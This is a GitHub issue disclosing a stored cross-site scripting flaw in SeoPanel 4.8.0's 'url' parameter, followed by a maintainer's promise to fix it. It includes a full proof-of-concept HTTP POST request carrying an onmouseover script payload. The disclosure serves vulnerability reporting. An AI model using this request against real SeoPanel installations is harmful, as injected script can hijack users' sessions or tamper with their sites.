Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Xss Stored #201

Closed
CloneAssassin opened this issue Dec 30, 2020 · 1 comment
Closed

[BUG] Xss Stored #201

CloneAssassin opened this issue Dec 30, 2020 · 1 comment
Assignees

Comments

@CloneAssassin
Copy link

CloneAssassin commented Dec 30, 2020

SeoPanel is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]
Environment

SeoPanel version: 4.8.0 Last Version

Parameter:
name="url" [ works on all pages where the parameter is present ]

PoC
POST /seo/seopanel/websites.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: /
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 203
Origin: xxx
DNT: 1
Connection: close
Referer: xxx
Cookie: PHPSESSID=xxx; hidenews=1

sec=update&oldName=test1&id=5&user_id=1&name=test1&url=https%3A%2F%2F%3Cmarquee+onmouseover%3D%22alert('Xss+12-30-2020')%22%3EoOo_(O.o)_oOo&title=test1&description=test1&keywords=test1&analytics_view_id=

SeoXss1

request CVE

@sendtogeo
Copy link

Hi Team,

Sorry for the late reply due to the new year vacation.

Thanks for reporting it to us and for the guidelines.

We will release a new version at the end of this month and will include fixes in it.

I will update you once it is released.

Thanks for the support .

@sendtogeo sendtogeo added this to the Seo panel 4.9.0 milestone Jan 5, 2021
@sendtogeo sendtogeo self-assigned this Mar 22, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants